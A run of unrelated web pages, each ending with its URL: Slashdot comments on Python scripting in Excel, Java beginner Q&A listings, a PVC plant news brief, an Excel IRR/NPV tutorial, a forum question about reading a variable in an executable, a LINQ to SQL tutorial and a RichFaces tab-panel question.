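print(foo == "1234")       # False: no silent cross-type coercion
print(int("1234") == foo)  # True: the conversion must be explicit

# Optional PEP 484 annotations; CPython itself ignores them at runtime.
def total(prices: list, tax_rate: float = 0.0) -> float:
    return sum(prices) * (1.0 + tax_rate)

print(total([1.0, 2.5], 0.1))
```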
Re: (Score:2) Re: (Score:2) Re: (Score:2) Why is /. so negative? (Score:5, Insightful) The way I see it, if Excel uses Python, it gives people more incentive to learn it and that can translate into people able to use it in other programs that use Python. Also, as someone who's had to troubleshoot broken VBA scripts on Excel, anything that can move us away from them is a win in my book. Re: (Score:2) Totally agree with you - the only thing I might add is the suggestion that rather than Python, .NET languages would make more sense. VBA in Excel has always been horrible. Re: (Score:2) Totally agree with you - the only thing I might add is the suggestion that rather than Python, .NET languages would make more sense. VBA in Excel has always been horrible. Well, there is Python for .NET (IronPython). Other than that I agree with you and the OP. Excel is an excellent tool for what it is supposed to be used for. That people use it as a database, that's a WTF, but that has nothing to do with the value of Excel and its automation. It is the perfect tool for most what-if analysis needs. I've known plenty of people that added value to their work with VBA in the financial/insurance world. Python is a much better choice for this, when you need complex mathematical fun Re: (Score:1) Re: (Score:2) Bearing in mind the despicable behavior of MS throughout its history, can you blame people for airing negative views about this company whenever it is mentioned? MS is harvesting what it has sowed, and will carry on doing so for a long time. When the idea is actually interesting and requested by developers. I think I can blame them. If no one was requesting this feature and they added it, we might be wondering why they are even bothering but the fact is that there are people who are requesting this feature. 
Yes, they have a history of making their own versions of things but I'm sure they've also done good things and believe it or not, it's not everyone in the company that has bad intentions. I like to give them the benefit of the doubt on this Re:Why is /. so negative? (Score:4, Interesting) Re: (Score:2) It would be great if we could have portable macros too. MS Office, Libre Office, Google Docs etc. all capable of opening and running the same macros. Re: Why is /. so negative? (Score:2) If you need scripting in your spreadsheet you're better off using plain Python or R. Doing an ANOVA in 32000 rows and 20000 columns on Excel is wrong and makes people that support those people cry. How much Malware is distributed via Excel? (Score:3) Interesting all the comments regarding malware being distributed by Excel. Doing a quick search, the amount of malware distributed by Excel is on the rise. I guess it comes from downloading pre-made spreadsheets - something I guess I'm immune to because other than an expense spreadsheet mandated by an employer, I don't think I've ever taken a spreadsheet where I didn't know its creator personally. In terms of adding macros from other sources, the one or two times I've done that they've ended up being more work to get functioning properly than writing them on my own. Could anybody comment on why this is such a big issue? Re: (Score:2) Could anybody comment on why this is such a big issue? I think that the main reason is that people don't understand how powerful Office macros really are. They can do many things, not just in the spreadsheet but everywhere on the computer. They are basically a program. The chances of a VBA script or a random executable doing something wrong on your computer are pretty much identical; but people might consider the first option less problematic and treat spreadsheets with macros more carelessly. Re: (Score:2) Re: (Score:2) Interesting all the comments regarding malware being distributed by Excel. 
Doing a quick search, the amount of malware distributed by Excel is on the rise. Could anybody comment on why this is such a big issue?
It's really anything Microsoft, as it's so widely distributed - more bang for your buck. Microsoft just doesn't get it; Word's default "was" to allow macros, and the list is extensive in this respect.

I like the philosophy of Python (Score:1)
Only one way to do anything.

Not true... (Score:3)
Only one way to do anything.
Except that isn't true... for example, you can format a string in several different ways. And then there are the different ways between 2 and 3. Perl's simple string interpolation is much easier and more straightforward.

The ultimate debugger (for non-devs) (Score:5, Interesting)
To all those predicting doom and gloom: Excel doesn't fit the role of an IDE, it fits the role of the debugger. Sometimes, much better than a debugger integrated in the IDE. For those who know what we are doing, a spreadsheet is a wonderful tool for rapidly prototyping business processes and gathering input from domain experts at the initial phase, when requirements are not at all clear and change quickly. Having a modern language friendly to exploration and prototyping would be a welcome addition.

Wrong Language (Score:2, Interesting)
Lua is more user friendly. It has fewer features, dynamic typing, starts at 1, doesn't care about whitespace, and was designed to be embedded within other things*. All those things are good qualities for people newish to programming.
*Which'll improve its security compared to Python. You can easily remove functions/modules from the language and you can isolate parts of a script from each other. It's trivial to load a new module and prevent it from accessing the I/O system.

Re: (Score:2)
Gee, a "wrong language, use this other one" post on Slashdot. What a surprise.

It's a trap! (Score:2)
It's a trap!
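The comment above about being able to format a string in several different ways is easy to demonstrate. Here is a small sketch (plain Python, nothing Excel-specific assumed) that builds the same string four ways:

```python
name, score = "Ada", 95.5

# Four different ways to produce the same string -- a counterexample
# to "only one way to do anything".
s1 = "%s scored %.1f" % (name, score)          # printf-style formatting
s2 = "{} scored {:.1f}".format(name, score)    # str.format
s3 = f"{name} scored {score:.1f}"              # f-string (Python 3.6+)
s4 = " ".join([name, "scored", str(score)])    # manual joining

assert s1 == s2 == s3 == s4 == "Ada scored 95.5"
```

Which of these counts as "idiomatic" has itself changed between Python versions, which is part of the commenter's point.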
Interesting but scary from a sysadmin perspective (Score:2)
I do a lot of end user computing work, and that includes supporting some of the "applications" written in Excel and Access that have somehow managed to insert themselves into the flow of millions of dollars. Adding another language, especially a more open-ended one like Python, is going to be an interesting backwards-compatibility exercise. The major problems we see with Office migrations are:
- Add-ins, usually written by a long-gone consulting company and critical to some business process
- VBA "applications"

Um...OpenOffice anyone? (Score:5, Informative)
Office suite + Python = OpenOffice. This is already a thing. [openoffice.org]

Re: (Score:2, Informative)
Ninja'd! I just checked and LibreOffice also supports Python for scripting. As would be expected, since Open/LibreOffice are essentially the same thing. This has been true for a long time, so Excel (just that, or is it possible in all Office components as in L/Ooffice?) is really just catching up here. Scripting can be done in Basic (equivalent but not identical to VBA), Javascript, Beanshell, and Python.

Re:Python in Excel... (Score:5, Insightful)
My gut reaction is YES YES YES, because I'm often stuck in Excel for... reasons... and don't like VBA much despite being pretty good at it. But like you said, it probably won't be Python - it will likely be MS Python, stuck at some version forever and probably without nicey-nice stuff like the scientific libraries and package management that make it so useful.

Re: (Score:2)
Even the old versions of Python are pleasant to work with. In some ways, more so than more recent versions. I remember when decorators were introduced and meta-programming became all the rage. While I could appreciate their purpose, I was not thrilled about the increased complexity. That said, these features are optional.

Re: (Score:2)
It's not the Python version, it's the libraries.
Freeze, say, Numpy or Scipy at their current version for 10 years. New libraries are unavailable... it largely loses its appeal. Like Perl without CPAN.

Re: (Score:2)
Well, the first thing is that it will probably be IronPython, so have fun even getting that stuff installed in the first place. Not that I'm too thrilled about this anyway. People already use Excel to do things that it really shouldn't be used for. Adding Python to the mix isn't going to help this any.

Re: (Score:2)
Adding Python to the mix isn't going to help this any.
Ahh, but it will help those of us who are stuck using Excel to do things that it really shouldn't be used for :)

Re: (Score:2)
Uh...no, it will be vanilla python. Microsoft doesn't do that shit anymore.

Re: (Score:2)
Without package management and the critical scientific libraries (Pandas, Scipy/Numpy, etc.), it is not "vanilla" Python in any meaningful way. I suppose these libraries could all be saved with the file, or they could add some kind of dependency management to Excel - but honestly, it just does not seem like we'll get a great result here. Hope you are right.

Re: (Score:2)
So, you are making shit up and then criticizing them for your made up shit?

Re: (Score:2)
Correct. I'm making up shit based on their past history. You should try it sometime, it's a very nice skill to have. George Bush even laid out the logic very eloquently once upon a time.

Obligatory Archer (Score:1)
Do you want to make insecure software? Because that's how you make insecure software.

Re: (Score:2)
Yes, as a matter of fact, I want to make insecure software. I can do this today in VBA, and it is quite useful. Opening and writing arbitrary files on the system and network is super-useful, and I don't see why they would change that just because they add Python as a scripting language.

Re: (Score:2)
I never said Python would make things worse. All I said was that allowing such things is a terrible idea, whatever the language is.

Re: (Score:2)
OK, but it already exists, and making insecure software is highly useful. It's not like my data crunching script will be public-facing, and I most certainly don't want to jump through hoops to read and write arbitrary data. In any event, my bare Python scripts are less secure than my VBA running in Excel. If someone double-clicks a python script (or compiled exe), it will execute arbitrary code, whereas Excel will make you click a box to execute a VBA macro.

Re: (Score:2)
wtf? scripting your data analysis in a spreadsheet makes insecure software?

Re: Obligatory Archer (Score:3)
Exactly. Why anyone would use computer software for automation is beyond me.

Re:C# (Score:5, Informative)
I have been wanting to be able to write C# to automate functions in an excel sheet.
You have been able to do that for a long time now. There are even different alternatives (e.g., relying on a template or creating everything on-the-fly). If I have to communicate with MS Office and I can choose how to do it, I would develop a C# or VB.NET application rather than relying on VBA.

Re: (Score:1)
This right here. And for that extra little bit of help in finding out how to "do it the right way", here's a wikipedia article that links to the correct toolset. From here, you can google the details.
Visual Studio Tools for Office [wikipedia.org]
https://developers.slashdot.org/story/17/12/15/1133217/microsoft-considers-adding-python-as-an-official-scripting-language-in-excel
more doubts sir. - Java Beginners own browser.Hope you will help me out.And also sir i need the progressbar...more doubts sir. Hello sir, Sir i have executed your code.... Thanking you! FAYAZ servlet n jsps - Java Beginners servlet n jsps How to do: 1.After log-out, if user cilick on "back...:// Thanks. hello, 1 = you can disable the back button of the browser. 2 == through session listner you can expire hi sir - Java Beginners hi sir Hi,sir,i am try in netbeans for to develop the swings,plz... the details sir, Thanks for ur coporation sir Hi Friend, Please visit the following link: what is the meaning of abstract? what is the meaning of abstract? what is the meaning of abstract what is the meaning this coad? what is the meaning this coad? what is the meaning this coad? Example Form example form = (Example Form) form implements runnable n extends thread - Java Beginners implements runnable n extends thread what is the difference between implements runnable n extends thread? public class...(); class...; private int num; StringThreadImplement(String s, int n){ str = new String(s what is the meaning of this or explain this what is the meaning of this or explain this List<Object[]> list=query.list(); Hi Friend, It will return the query values in the form of list. For more information, visit the following link: Hibernate Meaning of invoice Meaning of invoice hello, What is the meaning of invoice? hii, Invoice is a statement which contains the following listed things. Invoice Number Invoice date Name and address of the person Name and address What is the special meaning of __sleep and __wakeup? What is the special meaning of __sleep and __wakeup? What?s the special meaning of _sleep and _wakeup please do respond to my problem sooooon sir - Java Beginners to open the link also in my own browser.Hope you will help me out.And also sir i need...please do respond to my problem sooooon sir Hello sir, Sir i have... out. Thanking you! FAYAZ. 
Hi friend, i am sending progressbar hello sir, please give me answer - Java Beginners hello sir, please give me answer Write a program in Java that calculates the sum of digits of an input number, prints... ways in java? so , sir... you know how the next two while loops works Meaning Of annatations and use - Java Interview Questions Meaning Of annatations and use Hi all use of Annatations and exat meaning of annatations we create our own annatations give an Example...(); } Annotating the code (Annotation) Example (showSomething="Hi! How r you") public void What would you rate as your greatest weaknesses? What would you rate as your greatest weaknesses.... Be mindful of what you say. If you admit to a genuine weakness, you will be respected... of the question 1 when you start the interview. Once you know what is required. Tattoo Ideas for Girls with Meaning with meaning, before getting a tattoo. What can you say a girl with a tattoo...Tattoo Ideas for Girls with Meaning: Tattoos with deep meaning While many tattoos are just creative work of art, some text tattoos have a deeper meaning What?s the special meaning of __sleep and __wakeup? What?s the special meaning of __sleep and __wakeup? What?s the special meaning of _sleep and _wakeup swing program plz urgent sir - Java Beginners swing program plz urgent sir hi sir,i waan a jtable swings program table having column names "itemid","price".Initially table having single empty row.whenever we click the "enter" button automatically new row will be insert You know - Java Beginners You know Hi Rajnikant you know php...if you know php then please write the code and send me. My query is I have three table Consigne... table is the main table and all data would be fill manually. In the consign sir   would you please help me? would you please help me? Write a class Amount which stores sums of money given in pounds and pence. Your con- structor should take two ints.... 
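The sum-of-digits exercise asked about above ("calculates the sum of digits of an input number") can be answered briefly. The original question asks for Java; this is a quick Python sketch of the same idea:

```python
def digit_sum(n):
    """Sum of the decimal digits of an integer, e.g. 1234 -> 1 + 2 + 3 + 4 = 10."""
    n = abs(n)           # ignore a leading minus sign
    total = 0
    while n:
        total += n % 10  # take the last digit
        n //= 10         # drop the last digit
    return total
```

The same two-line loop body (modulo to read a digit, integer division to discard it) translates directly to Java.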
If a withdrawal would make the balance less than zero, your class should print What is Java - Java Beginners What is Java What is Java and how a fresher can learn it fast? Can any one share the fastest learning tips for Java Programming language? Thanks! Hi,Java is one of the most popular programming language. You can learn If you came on board with us, what changes would you make in the system? If you came on board with us, what changes would you make in the system.... You may be very bright, but no one can really understand what needs to be done... in this organization is stupid. Your answer should therefore reflect that you would like a java program - Java Beginners a java program well sir, i just wanna ask you something regarding...); } System.out.print("would you like to Continue y or n:"); str=br.readLine... for more information. Please guide me sir - EJB 3.0 or should learn Spring and Hibernate.I am confused what should i do learn.... Answers Hi friend, you can learn very easy way. Read for more Why would we want a Database? Part-3 : Why would we want a Database? Most of the beginners are asking... the website your client want to change the design of the website. Then, what will you do... how useful the database is, when you are making a dynamic website. It provides Hello Sir I Have problem with My Java Project - Java Beginners Hello Sir I Have problem with My Java Project Hello Sir I want Ur Mail Id To send U details and Project Source Code, plz Give Me Ur Mail Id diff betn show n visible diff betn show n visible what is difference between show() & visible method in java What is singleton? - Java Beginners What is singleton? Hi, I want to know more about the singleton in Java. Please explain me what is singleton in Java? Give me example of Singleton class. Thanks hello, Singleton is a concept in which you characters java - Java Beginners you input that word) The word howdy has 5 characters. What letter would you...) There are 0 A's. 
What letter would you like to guess?(Enter zero to quit.) b (sample you input that letter) There are 0 B's. What letter would you like to guess. what is xfire? - Java Beginners what is xfire? What is XFire? I found it?s a free gaming... allow your friend to join too. Search Internet if you want to learn it. ... and the CXF website.Codehaus XFire is a next-generation java SOAP framework When would you use the Builder Pattern? When would you use the Builder Pattern? When would you use the Builder Pattern why we use ^ operator in sql, and what is the meaning of that operator? why we use ^ operator in sql, and what is the meaning of that operator? why we use ^ operator in sql, and what is the meaning of that operator java error - Java Beginners :deprecation for details. Hello Sir ,What is the meaning of above lines ,how i can...java error G:\threading>javac threadmethods.java Note...; Hi Friend, You are using any deprecated method or something that has What do you mean by Serialized? What do you mean by Serialized? What do you mean by Serialized? Hi, It is the part of the isolation level , Its bassically use... until the current transaction finishes. No new data can be inserted that would What is JavaScript? there career in Java. For java programming beginners always try to know What is Java script and other java related queries. How to define what is JavaScript? Thanks, Hi, For Java programmers its very necessary to know "What servlet - Java Beginners servlet for servlet study which book is good.plz tellme as soon as possible. Hi Complete Reference is good book. i think sanjay you can learn more detail here, This is what i need - Java Beginners This is what i need Implement a standalone procedure to read in a file containing words and white space and produce a compressed version of the file...)as (Iliketoplayfootball) without any compressing the file. thank you Hi What do you mean by Read Committed? What do you mean by Read Committed? 
What do you mean by Read Committed? Hi, Data records retrieved by a query are not prevented from modification by some other transactions. Non-repeatable reads may occur, meaning Would you initialize your strings with single quotes or double quotes? Would you initialize your strings with single quotes or double quotes? Would you initialize your strings with single quotes or double quotes We would like to hear about your goals. would also need to research about what you might need in such a product. I can do.... Would you be able to tell me what that is?” You can also say “I am sure... this product already, why would you have gone for it? Apart from that? Is there any determinant of n*n matrix using java code determinant of n*n matrix using java code Here is my code... { double A[][]; double m[][]; int N; public input() { Scanner s=new Scanner(System.in); System.out.println("enter dimension of matrix"); N java program - Java Beginners java program plzzzzz help me on this java programming question? hello people.. can u plzzzzzzzzzzzzzzzzzzz help me out with this java programm. its... of this would be really great...... and i dont mind if u can give me the whole what is meta data in java what is meta data in java what is meta data in java Use ArrayList when there will be a large variation in the amount of data that you would put into an array. A disadvantage of a ArrayList is that it holds only what technique - Java Beginners what technique what technique or algorithm i need to use to develop a system a scheduling time table in java word program - Java Beginners you input that word) The word howdy has 5 characters. What letter would you... A's. What letter would you like to guess?(Enter zero to quit.) b (sample you input that letter) There are 0 B's. What letter would you like to guess What do you mean by platform independence? What do you mean by platform independence? Hi, What do you mean... of java language that makes java as the most powerful language. 
Not even a single language is idle to this feature but java is more closer to this feature What is command line argument in Java in Java and how one can use it to create a program in Java? Can you post any... visit the following link: beginners - Java Beginners java beginners what is StringTokenizer? what is the funciton... the following links: What is composition? - Java Beginners What is composition? Hi, What is composition? Give example of composition. Thanks what are the loopholes in java - Java Beginners what are the loopholes in java what are the loopholes in java What Is Thread In Java? What Is Thread In Java? In this section we will read about thread in Java... Thread in Java has implemented with the same meaning that actually... a simple example which will demonstrate you about how to write thread in Java. Here java - Java Beginners Java array add What is array and how can i add an element into an array in Java? IT would be nice if you can give an example.Thanks Sum of first n numbers Sum of first n numbers i want a simple java program which will show the sum of first n numbers.... import java.util.*; public class... Scanner(System.in); System.out.print("Enter value of n: "); int n what is this.. - Java Beginners what is this.. what is the differece between platform independant and platform dependant? Hi Friend, Difference: Platform Independent means not restricted to particular Opearting System environment from program print hello n hi print hello n hi how to write a java program that prints "hello" 5 times, "hi" 1 time n again "hello" 4 times..?? do reply what is a indentifier - Java Beginners what is a indentifier What is an identifier and what is the definition? An identifier is an unlimited-length sequence of Java letters and Java digits, the first of which must be a Java letter. An identifier cannot java - Java Beginners java Hai.... Sir......... My java code is Pasted below... 
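The "sum of first n numbers" question above has a one-loop answer; here is a Python sketch (the question asks for Java, but the logic is identical), along with the closed form for comparison:

```python
def sum_first_n(n):
    # Straightforward accumulation loop, as a beginner exercise usually expects.
    total = 0
    for i in range(1, n + 1):
        total += i
    return total

def sum_first_n_formula(n):
    # Gauss's closed form gives the same answer without a loop: n * (n + 1) / 2
    return n * (n + 1) // 2
```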
= new Label("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n TEXTURE FEATURES \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",Label.CENTER); Label Label4 = new Label readline Error - Java Beginners (). You would have to to enter 'nn' for the code to exit. I think the problem... world, you would see the text (ye world), again the first char is missing...readline Error Hi sir, please helpme with my code. Mycode does java - Java Beginners java Sir, My code is attached below... It shows the selected file from Jfilechooser... But we can see only a small portion... Can you help... JTextField("", 20); JLabel JLabel1 = new JLabel("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n java programming - Java Beginners much money would you like to transfer? ..."); state = TRANSFER...(); mScreen.setText("How much money would you like to take out...java programming heloo there, hopw all of u guys are fine my Java - Java Beginners Java Sir, My code is attached below.. I want to retrieve... in small size... CAn you help see tha retrive images in right side of the panel...); JLabel JLabel1 = new JLabel("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n TEXTURE FEATURES Main function.. - Java Beginners []) What does it mean...public - static - void - main -(String args[]) Can u plz explain Each n Every word... 1.String args[] DIFFERENCE... / package static: You need not have an instance of the class to access the method PYRAMID - Java Beginners : A (so it will display a Pyramid OR TRIANGLE) would you like to continue y or n: y Enter a character: B * * * * * * * * * * * * * * * would you...("would you like to Continue y or n:"); str=buff - Java Beginners java sir, there is few questions which i tried but did not get succeed in it...will you help me to overcome it? my quetion is two numbers... numbers and check whether they are twin prime.? Thank you very much for your interface - Java Beginners Interface meaning in java What is the meaning of Interface? 
and why we need to call java - Java Beginners Define what is Vector with an example?why it is used and where it is used Define HashTable ? how can we enter the Keys and Values in HashTable ? would u give...(System.in)); System.out.print("How many elements you want to enter to the hash Advertisements If you enjoyed this post then why not add us on Google+? Add us to your Circles
http://www.roseindia.net/tutorialhelp/comment/10204
31 October 2012 08:33 [Source: ICIS news]

SINGAPORE (ICIS)--“This is a regular turnaround,” the source said, adding that it will last for about five days.

Haohua Yuhang has a total PVC capacity of 500,000 tonnes/year, with 400,000 tonnes/year at Qinyang. The producer sold carbide-based PVC during the turnaround at yuan (CNY) 6,500/tonne ($1,042/tonne) EXW (ex-works) on 31 October, according to Chemease.

The spot PVC prices in central

The shutdown of the unit may not have any significant impact on the local PVC market because of end-users’ weak demand, a local PVC market player said.
http://www.icis.com/Articles/2012/10/31/9609080/chinas-haohua-yuhang-chemical-shuts-pvc-unit-on-30.html
How to Calculate the Return Measure in QuickBooks 2013 There are two basic ways that you can calculate a return by using Microsoft Excel. You cannot do this calculation by using QuickBooks 2013 alone. To calculate a rate of return with Microsoft Excel, you first enter the cash flows produced by the investment. Even if you’ve never used Excel before, you may be able to construct this; all you have to do is start Excel (the same way you start any other Windows program). Then you enter the cash flows shown for the building investment. Actually, you enter only the values shown in cells B2, B3, B4, B5, and so on, through cell B22. These values are the cash flow numbers calculated and summarized here: In case you are new to Excel, all you do to enter one of these values is click the box (technically called a cell) and then type the value. For example, to enter the initial investment required to buy the building — $65,000 — you click the B2 cell and then type –65000. After you type this number, press Enter. You enter each of the other net cash flow values in the same manner in order to make the rate of return calculations. After you provide the cash flow values of the investment, you tell Excel the rate of return that you want calculated. In Cell G4, for example, an internal rate of return is calculated. An internal rate of return (IRR) is the interest rate that the investment delivers. For example, a CD that pays an 11 percent interest rate pays an 11 percent internal rate of return. To calculate an internal rate of return, you enter an internal rate of return function formula into a worksheet cell. In the case of the worksheet shown, you click cell G4 and then type the following: =IRR(B2:B22,.1) If you’ve never seen an Excel function before, this probably looks like Greek. But all this function does is tell Excel to calculate the internal rate of return for the cash flows stored in the range, or block of cells, that goes from cell B2 to cell B22. 
The .1 is an initial guess about the IRR; you provide that value so that Excel has a starting point for calculating the return. The office building cash flows, it turns out, produce an internal rate of return equal to 11 percent. This means that essentially, the office building delivers an 11 percent interest rate annually on the amounts invested in the office building.

Another common rate of return measure is something called a net present value, which essentially specifies by what dollar amount the rate of return on a business exceeds a benchmark rate of return. For example, the worksheet shows the net present value equal to $9,822.37. In other words, this investment exceeds a benchmark rate of return by $9,822.37. You can’t see it — it’s buried in the formula — but the benchmark rate of return equals 10 percent. So this rate of return essentially is $9,822.37 better than a 10 percent rate of return.

To calculate the net present value by using Excel, you use another function. In the case of the worksheet shown, for example, you click cell G6 and type the following formula:

=NPV(0.1,B3:B22)+B2

This formula looks at the cash flows for years 1 through 20, discounts these cash flows by using a 10 percent rate of return, and then compares these discounted cash flows with the initial investment amount, which is the value stored in cell B2. This all may sound a bit tricky, but essentially, this is what’s going on: The net present value formula looks at the cash flows stored in the worksheet and calculates the present value amount by which these cash flows exceed a 10 percent rate of return. The discount rate equals the rate of return that you expect on your capital investments. The discount rate is the rate at which you can reinvest any money you get from the capital investment’s cash flows.

An important thing to know about pre-tax cash flows and returns versus after-tax cash flows and returns: Make sure that you’re using apples-to-apples comparisons.
It’s often fine to work with pre-tax cash flows; just make sure that you’re comparing pre-tax cash flows with other pre-tax cash flows. You don’t want to compare pre-tax returns with after-tax returns. That’s an apples-to-oranges comparison. Predictably, it doesn’t work.
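The arithmetic behind the two worksheet functions described above can also be expressed outside Excel. The sketch below is Python, using a simple bisection search rather than whatever root-finding method Excel uses internally (an assumption, since that algorithm is not documented here): NPV discounts each cash flow back to time zero, and IRR is the discount rate at which NPV crosses zero.

```python
def npv(rate, cashflows):
    # cashflows[0] is the time-0 amount (the initial outlay, usually negative),
    # mirroring the =NPV(0.1, B3:B22) + B2 pattern from the text.
    return sum(cf / (1 + rate) ** t for t, cf in enumerate(cashflows))

def irr(cashflows, lo=-0.99, hi=10.0):
    # Bisection: narrow in on the rate where NPV changes sign.
    # Assumes exactly one sign change between lo and hi.
    for _ in range(200):
        mid = (lo + hi) / 2
        if npv(lo, cashflows) * npv(mid, cashflows) <= 0:
            hi = mid
        else:
            lo = mid
    return (lo + hi) / 2
```

For example, for cash flows of -100 now and 60 at the end of each of the next two years, the IRR works out to roughly 13 percent.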
http://www.dummies.com/how-to/content/how-to-calculate-the-return-measure-in-quickbooks-.html
Hi everyone. I am working on a project which has to change the value of a variable in the executable. Specifically, writing this program:

int a = -1;
int b = 3;
int c = a + b;

I have to go into the executable and change the value of "a" in the executable. Let me not extend this too much, and show you what I have done. At this moment I do not know why this is not working. I am trying to make sure that I am looking at the right place before I try to change the value. Thanks for any help you can give me.

#include <iostream>
#include <fstream>

using namespace std;

int main()
{
    ifstream myFile;
    char temp1;

    // Open in binary mode so that seekg/read operate on raw bytes.
    myFile.open("C:/Documents and Settings/Angel/Desktop/Virus/Hex/Debug/Hex.exe",
                ios::in | ios::binary);
    if (!myFile)
    {
        cout << "File could not be opened.\n";
    }
    else
    {
        myFile.seekg(0x0000158B); // Seeks the position of variable a in the binary file / executable.
        myFile.read(&temp1, 1);   // read() takes a char*, so pass the address of temp1.
        cout << "Value is " << (int)temp1 << endl;
        myFile.close();
    }
    return 0;
}
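The same seek-and-patch idea can be sketched in Python for comparison. The offset 0x158B and the 4-byte little-endian layout below are assumptions specific to the poster's build; you would confirm both in a hex editor or disassembler before writing anything:

```python
import struct

def read_int32(path, offset):
    # Read a 4-byte little-endian signed integer at the given file offset.
    with open(path, "rb") as f:
        f.seek(offset)
        return struct.unpack("<i", f.read(4))[0]

def write_int32(path, offset, value):
    # "r+b" updates bytes in place without truncating the rest of the file.
    with open(path, "r+b") as f:
        f.seek(offset)
        f.write(struct.pack("<i", value))
```

Note that patching a constant like `a = -1` this way only works if the compiler actually stored the literal in the image; an optimizing build will often fold `a + b` at compile time, leaving nothing at that offset to patch.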
https://www.daniweb.com/programming/software-development/threads/34974/reading-writing-to-executable
A LINQ Tutorial

As noted in numerous other postings, I’m convinced that LINQ is an essential aspect of serious Windows Phone (or virtually any .NET) programming. One of the great tools to come along for learning and working with LINQ is LinqPad, created by Joseph Albahari. In my forthcoming book Programming Reactive Extensions and Linq we use LinqPad for virtually all the exercises, as I do for many example postings here. It is important to be able to translate from LinqPad (which strips down a program to its essentials) to Visual Studio, where you will almost certainly be doing the bulk of your serious programming. In this posting we’ll take a LINQ query, examine it in LinqPad and then migrate it to Visual Studio. Along the way we’ll look at how you can interact with a database file in LINQ and how you can set the datacontext for a LINQ to SQL query.

Northwind

To begin, download the Northwind database from Microsoft, and place it in a known location. Open LinqPad and click on Add Connection in the upper left, as shown in the figure. Click Next and then choose AttachDatabase file and browse to the file you just saved. Leave the other settings as-is and click OK. Notice that the Database setting (at the top of the main window) now indicates Northwind.mdf and the location of your file. You are ready to query against that database.

A Simple Query With A Filter

To begin, let’s do a simple query in which we will find the ContactID, CompanyName and ContactName for every Customer in London,

DataContext dataContext = this;

var query = from Contact in dataContext.GetTable<Contacts>()
            where Contact.City == "London"
            select new
            {
                Contact.ContactID,
                Contact.CompanyName,
                Contact.ContactName
            };

query.Dump();

Running this query returns the appropriate records in the Results Window. Dump() is a LinqPad method that displays very much as Console.WriteLine does.
Skip and Take

We can narrow these results with a couple of standard LINQ operators:

- Skip
- Take

These do pretty much what you’d expect: skip skips over the given number of records, and then take puts the given number of records into the IEnumerable. We can append these to the query and then show the results.

DataContext dataContext = this;

var query = from Contact in dataContext.GetTable<Contacts>()
            where Contact.City == "London"
            select new
            {
                Contact.ContactID,
                Contact.CompanyName,
                Contact.ContactName
            };

var afterSkipping = query.Skip(2);
var takingTwo = afterSkipping.Take(2);

takingTwo.Dump();

The output of this, as you would expect, is the third and fourth record. Notice that by using LinqPad all the peripheral code involved with setting up the DataContext, managing the objects associated with the query, and so forth is eliminated or simplified, allowing you to focus on the LINQ statements. That’s all well and good, but how do you translate this back into a C# program?

Migrating To Visual Studio

To move this program into Visual Studio, open a new Console application.

Library and Includes

We’re going to be working with LINQ to SQL, so be sure to add the library for System.Data.Linq and add the following two include statements to each file,

using System.Data.Linq;
using System.Data.Linq.Mapping;
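For readers coming from outside .NET, Skip and Take are just paging operators. A rough Python equivalent of the Skip(2).Take(2) step above, with a stand-in list instead of the Northwind table, looks like this:

```python
from itertools import islice

# Stand-in for the filtered London contacts from the LINQ query.
contacts = [
    {"id": "AROUT", "company": "Around the Horn"},
    {"id": "BSBEV", "company": "B's Beverages"},
    {"id": "CONSH", "company": "Consolidated Holdings"},
    {"id": "EASTC", "company": "Eastern Connection"},
    {"id": "NORTS", "company": "North/South"},
]

# Skip(2) then Take(2): islice(seq, start, stop) does both in one call.
page = list(islice(contacts, 2, 2 + 2))  # the third and fourth records
```

As with a LINQ query, `islice` is lazy: nothing is consumed from the underlying sequence until you iterate the result (here, by wrapping it in `list`).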
To do so, create a new class named Customer and adorn the class and its properties with attributes

[Table( Name = "Customers" )]
class Customer
{
    [Column( IsPrimaryKey = true )]
    public string CustomerID { get; set; }

    [Column( Name = "ContactName" )]
    public string Contact { get; set; }

    [Column( Name = "CompanyName" )]
    public string Company { get; set; }

    [Column]
    public string City { get; set; }
}

You are free to add properties that do not have the Column attribute and which do not map to columns in the database; thus allowing your objects to extend the values in the database. Notice the Table attribute has the Name= attribute, allowing your class to have a different name than the table. Similarly, the second and third columns use the Name= attribute to allow a property to map to a column with a different name. Finally, the first property, CustomerID, has the IsPrimaryKey attribute set to true, as must be done for at least one property in every LINQ to SQL class.

Create The DataContext

You are ready to create the all-important DataContext object and then to use that to query the database and to populate instances of your class. Open Program.cs and in the constructor, create the DataContext, passing in the path to the Northwind database file. On my machine that looks like this:

DataContext db = new DataContext( @"L:\Downloads\Northwind\Northwind.mdf" );

The DataContext encapsulates an ADO.Net Connection object that is initialized with the connection string that you supply in the constructor. This and all of ADO.Net is quite well hidden by LinqToSql.

Query The Database

Use that database to retrieve a strongly-typed instance of Table<Customer> (the type you created earlier in Customer.cs).
Then create your query statement, extracting it directly from LinqPad:

Table<Customer> Customers = db.GetTable<Customer>();

var CustomerQuery =
    from c in Customers
    where c.City == "London"
    select new
    {
        c.CustomerID,
        c.Company,
        c.Contact
    };

All that's left is to iterate through the results and to show the output, in this case using Console.WriteLine:

foreach (var cust in CustomerQuery)
{
    Console.WriteLine(
        "id = {0}, Company = {1}, Contact = {2}",
        cust.CustomerID,
        cust.Company,
        cust.Contact );
}

Here's the output:

id = AROUT, Company = Around the Horn, Contact = Thomas Hardy
id = BSBEV, Company = B's Beverages, Contact = Victoria Ashworth
id = CONSH, Company = Consolidated Holdings, Contact = Elizabeth Brown
id = EASTC, Company = Eastern Connection, Contact = Ann Devon
id = NORTS, Company = North/South, Contact = Simon Crowther
id = SEVES, Company = Seven Seas Imports, Contact = Hari Kumar
tabPanel: selected tab is lost

Alan, Mar 20, 2007 10:01 AM

I am using a tabPanel to organize sets of functions. Each tab will provide a set of functions/links per user role. When navigating (clicking a link) within a tab, the currently selected tab is lost and the browser will go back to the first tab. The user doesn't want to click again on the tab he/she is working on. The server should remember that state. How can I do this? Right now I am using request parameters, but this is not very clean. Further, Seam and Facelets are used.

<rich:tabPanel
  <rich:tab
    Test Tab..
  </rich:tab>
  <rich:tab
    <s:link
      <f:param
    </s:link>
    <s:link
      <f:param
    </s:link>
    <ui:define
  </rich:tab>
</rich:tabPanel>

In this case both views, persons and companies, use the above template and define their own body content. I would like to use some sort of valueChangeListener that informs me when tabs are changed, store the active tab in a managed bean, and use that in the selectedTab attribute. But somehow I can't get the valueChangeListener nor a backing bean to work.

